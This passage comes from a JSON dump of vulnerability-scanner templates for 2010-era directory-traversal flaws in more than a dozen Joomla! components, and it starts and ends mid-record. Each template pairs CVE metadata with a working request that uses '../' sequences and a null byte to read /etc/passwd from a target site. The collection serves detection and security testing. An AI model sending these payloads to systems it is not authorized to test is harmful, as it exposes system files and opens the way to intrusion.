\"{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100d3a39a822ed7fbffac4de0f1b0254ff4507f47002fe439be08c0983ec7a8613d022100958197a26e1b207a6910133f8e31baf385295e45ef9b589a8961292891f251c5:922c64590222798bb761d5b6d8e72950", "hash": "274566e41a38b831348f3246e1487f26", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e6d" }, "name": "CVE-2010-0982.yaml", "content": "id: CVE-2010-0982\n\ninfo:\n name: Joomla! Component com_cartweberp - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further exploitation.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/10942\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0982\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2010-0982\n cwe-id: CWE-22\n epss-score: 0.0087\n epss-percentile: 0.80553\n cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlamo\n product: com_cartweberp\n tags: cve2010,cve,joomla,lfi,edb,joomlamo\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205938263a02a9a36a6233aad621dcf2594c70bf868c9ccb51b37a2b5a55a22859022100f0c21b9c2a268b13bbc95dbc3e86f6e0488338965b090161ec90ebcff75bf975:922c64590222798bb761d5b6d8e72950", "hash": "4ad41d93e2e3c8cbf20ec9705f3e2372", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e6e" }, 
"name": "CVE-2010-0985.yaml", "content": "id: CVE-2010-0985\n\ninfo:\n name: Joomla! Component com_abbrev - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/10948\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0985\n - http://www.exploit-db.com/exploits/10948\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/55348\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-0985\n cwe-id: CWE-22\n epss-score: 0.01222\n epss-percentile: 0.83839\n cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: chris_simon\n product: com_abbrev\n tags: cve,cve2010,joomla,lfi,edb,chris_simon\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100bca78e57f920f69e926e7fda61bfc9c1081621b67537c840fd5c4998a6e760b6022100bd476afda728ebf5fd521130fb22289a8aa64372043a3c537b90a9b626ad34f6:922c64590222798bb761d5b6d8e72950", "hash": "af3f9add917b432a29ee01917c0b4b83", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e6f" }, "name": "CVE-2010-1056.yaml", "content": "id: CVE-2010-1056\n\ninfo:\n name: Joomla! 
Component com_rokdownloads - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/11760\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1056\n - http://www.rockettheme.com/extensions-updates/638-rokdownloads-10-released\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/56898\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1056\n cwe-id: CWE-22\n epss-score: 0.06484\n epss-percentile: 0.93567\n cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rockettheme\n product: com_rokdownloads\n tags: cve,cve2010,joomla,lfi,edb,rockettheme\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022063751b0bb22265abceda515f563474e54ddd0bb7bf04addcfc369c1a3c21f69c022100a2bdd7c3930a8da95f5c7e7d673fae8b107d53fd646041880a655aa9249b1ec1:922c64590222798bb761d5b6d8e72950", "hash": "55ad16540a380c3e0db2f604f8173d4d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e70" }, "name": "CVE-2010-1081.yaml", "content": "id: CVE-2010-1081\n\ninfo:\n name: Joomla! 
Component com_communitypolls 1.5.2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation lets an unauthenticated remote attacker read arbitrary files readable by the web server process (this template confirms the flaw by retrieving /etc/passwd), leading to information disclosure. The CVSS vector (C:P/I:N/A:N) reflects read-only access; code execution is not established for this issue.\n remediation: Upgrade Community Polls to version 1.5.3 or later (the vendor security release linked in the references).\n reference:\n - https://www.exploit-db.com/exploits/11511\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1081\n - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1081\n cwe-id: CWE-22\n epss-score: 0.0168\n epss-percentile: 0.8632\n cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: corejoomla\n product: com_communitypolls\n tags: cve,cve2010,joomla,lfi,edb,corejoomla\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022020268f779e361916bc07ce33e39192307f3bce053f3a189e088b1f836199e7ca02201a54a5155fcfc628c13a0d8282ac74dba004ed58582cdf30fad1985c90f82252:922c64590222798bb761d5b6d8e72950", "hash": "07f3e5d82b49e804e8a91769ecc769f9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e71" }, "name": "CVE-2010-1217.yaml", "content": "id: CVE-2010-1217\n\ninfo:\n name: Joomla! 
Component & Plugin JE Tooltip 1.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/11814\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1217\n - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt\n - http://www.exploit-db.com/exploits/11814\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2010-1217\n cwe-id: CWE-22\n epss-score: 0.01155\n epss-percentile: 0.84543\n cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: je_form_creator\n product: je_form_creator\n tags: cve,cve2010,edb,packetstorm,joomla,lfi,plugin,je_form_creator\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201a816ac69e3484194480569546383ac95a39384b1b81b2edcca4f7d78766e49d022100b824268cecc97ebb54940329e54d6aa376f07f1fb432068386894a744808661d:922c64590222798bb761d5b6d8e72950", "hash": "97e806776aa997069f6d18bac7d4e53e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e72" }, "name": 
"CVE-2010-1219.yaml", "content": "id: CVE-2010-1219\n\ninfo:\n name: Joomla! Component com_janews - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11757\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1219\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/56901\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1219\n cwe-id: CWE-22\n epss-score: 0.00813\n epss-percentile: 0.81406\n cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: com_janews\n product: com_janews\n tags: cve,cve2010,joomla,lfi,edb,com_janews\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022078e94288c545c86d3739bfc673b0cb40d9db80ede64d7de24b9bfe1562d54d01022069a099e794e1021a4404dc94821f8840fe88456b958ec238d5edee3da0c18505:922c64590222798bb761d5b6d8e72950", "hash": "717f9732ce2ece98c43dc0a0a86a2ecc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e73" }, "name": "CVE-2010-1302.yaml", "content": "id: CVE-2010-1302\n\ninfo:\n name: Joomla! 
Component DW Graph - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11978\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1302\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1302\n cwe-id: CWE-22\n epss-score: 0.01204\n epss-percentile: 0.84918\n cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: decryptweb\n product: com_dwgraphs\n tags: cve,cve2010,edb,joomla,lfi,graph,decryptweb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100bb37e531453032b693abfd563eb09d145f724ef3ca1d86023b9f1b2fbe4d107e02207df22aa55b994ea2c6bb5f7823da50701a07a15cc04d87e133ca41618351011d:922c64590222798bb761d5b6d8e72950", "hash": "0dc5aaa830775ff291a17dfd1559db16", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e74" }, "name": "CVE-2010-1304.yaml", "content": "id: CVE-2010-1304\n\ninfo:\n name: Joomla! 
Component User Status - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11998\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1304\n - http://www.exploit-db.com/exploits/11998\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57483\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1304\n cwe-id: CWE-22\n epss-score: 0.0045\n epss-percentile: 0.74575\n cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlamo\n product: com_userstatus\n tags: cve,cve2010,joomla,lfi,status,edb,joomlamo\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d3cb43212c8a3df17ee31855688e3d652f5314ee4124a7bd521c42f1982d460502201239ce976e80c6e0076a2883ce41cb8bd687c8176e3c5073b2239895d476ebdb:922c64590222798bb761d5b6d8e72950", "hash": "22d162af75ab4cf5c8a7d8911a3077d9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e75" }, "name": "CVE-2010-1305.yaml", "content": "id: CVE-2010-1305\n\ninfo:\n name: Joomla! 
Component JInventory 1.23.02 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12065\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1305\n - http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951\n - http://www.vupen.com/english/advisories/2010/0811\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57538\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1305\n cwe-id: CWE-22\n epss-score: 0.03203\n epss-percentile: 0.90236\n cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlamo\n product: com_jinventory\n tags: cve,cve2010,joomla,lfi,edb,joomlamo\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008359d835a31bb6cdf1904ec4e2657c736624dfcfa5fcd01f3a02a8257d33048d02204b9552e1cb25efd557234b0af9313dd2f5474de89c5865b764178e1d4d38905e:922c64590222798bb761d5b6d8e72950", "hash": "d5d6400214df707478cdef6e851b3104", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e76" }, "name": "CVE-2010-1306.yaml", "content": "id: CVE-2010-1306\n\ninfo:\n name: Joomla! 
Component Picasa 2.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12058\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1306\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57508\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1306\n cwe-id: CWE-22\n epss-score: 0.01242\n epss-percentile: 0.85196\n cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: roberto_aloi\n product: com_joomlapicasa2\n tags: cve,cve2010,joomla,lfi,edb,roberto_aloi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220548521f736459dae087d6a2bd94e3ae9773f5b831cff83356187c4188522b8f802201265d0b432dbacee031aaaf9bcbc72699612e5e25f881527cde284df0d35481c:922c64590222798bb761d5b6d8e72950", "hash": "af994bc549a20837d75ec371231da941", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e77" }, "name": "CVE-2010-1307.yaml", "content": "id: CVE-2010-1307\n\ninfo:\n name: Joomla! Component Magic Updater - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! 
allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12070\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1307\n - http://www.vupen.com/english/advisories/2010/0806\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57531\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1307\n cwe-id: CWE-22\n epss-score: 0.01751\n epss-percentile: 0.86604\n cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: software.realtyna\n product: com_joomlaupdater\n tags: cve,cve2010,edb,joomla,lfi,software.realtyna\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205ee411e0df19bcb5be4939061e5b85f81c3ee3250e70223ecf19da638a332c6802207f1fbb956555429b3a2c32ad9d53e161530e3ebb76b3b8fafbc6483ff62c0d35:922c64590222798bb761d5b6d8e72950", "hash": "1937557698663b6ed9324cc393f7ddd2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e78" }, "name": "CVE-2010-1308.yaml", "content": "id: CVE-2010-1308\n\ninfo:\n name: Joomla! Component SVMap 1.1.1 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12066\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1308\n - http://www.vupen.com/english/advisories/2010/0809\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1308\n cwe-id: CWE-22\n epss-score: 0.01334\n epss-percentile: 0.85765\n cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: la-souris-verte\n product: com_svmap\n tags: cve,cve2010,joomla,lfi,edb,la-souris-verte\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c29bf12509751c6d4971b808635de57b7692d9e53df31d4b294649bb5ce456db022100bd518edc4ef976a87843b5cf5c4eec01353017a668000897cd0020a9fd09f094:922c64590222798bb761d5b6d8e72950", "hash": "7910bf6404bb565b1c7aaaf1e2b29781", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e79" }, "name": "CVE-2010-1312.yaml", "content": "id: CVE-2010-1312\n\ninfo:\n name: Joomla! Component News Portal 1.5.x - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12077\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1312\n - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1312\n cwe-id: CWE-22\n epss-score: 0.01155\n epss-percentile: 0.83338\n cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ijoomla\n product: com_news_portal\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,ijoomla\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d20ace89e5fba9e38e12b29dcdf7f94465027da5466716242a9d9a23d933a1b202200ead3153d09e06b648a9c10ea73a58a9c85db18e8c136d6d177acdccb61f00fd:922c64590222798bb761d5b6d8e72950", "hash": "34ab60ce8ab7a5d1da9305f1a189a4dc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e7a" }, "name": "CVE-2010-1313.yaml", "content": "id: CVE-2010-1313\n\ninfo:\n name: Joomla! Component Seber Cart 1.0.0.12 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. 
(dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! CMS.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12082\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1313\n - http://www.exploit-db.com/exploits/12082\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2010-1313\n cwe-id: CWE-22\n epss-score: 0.0045\n epss-percentile: 0.72402\n cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: seber\n product: com_sebercart\n tags: cve,cve2010,joomla,lfi,edb,seber\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e2ee5113ea7ef6e40728910e3d42e905985b5b2f7ce07d14947241170a9a1dc9022029c4419ef7ee627daa6f2d32119c452f396ae07a75d68bf757f8b36f3d72279e:922c64590222798bb761d5b6d8e72950", "hash": "7a57aed4f8acc8d8b9eb8d7b3c4cc5dc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e7b" }, "name": "CVE-2010-1314.yaml", "content": "id: CVE-2010-1314\n\ninfo:\n name: Joomla! Component Highslide 1.5 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12086\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1314\n - http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1314\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.75244\n cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlanook\n product: com_hsconfig\n tags: cve,cve2010,lfi,edb,packetstorm,joomla,joomlanook\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009af853087a4818f3b40be3d023435dd789ec1badcb73949d41adfdfb8ffbe233022100d3bf069aa45a4e07a8ab6390cdc65d98ef6675f01ea2c12cba76b36042b91fc5:922c64590222798bb761d5b6d8e72950", "hash": "6c1a3b005fd5834bd163d9b63d828cd0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e7c" }, "name": "CVE-2010-1315.yaml", "content": "id: CVE-2010-1315\n\ninfo:\n name: Joomla! Component webERPcustomer - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11999\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1315\n - http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57482\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1315\n cwe-id: CWE-22\n epss-score: 0.0087\n epss-percentile: 0.82023\n cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlamo\n product: com_weberpcustomer\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,joomlamo\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - 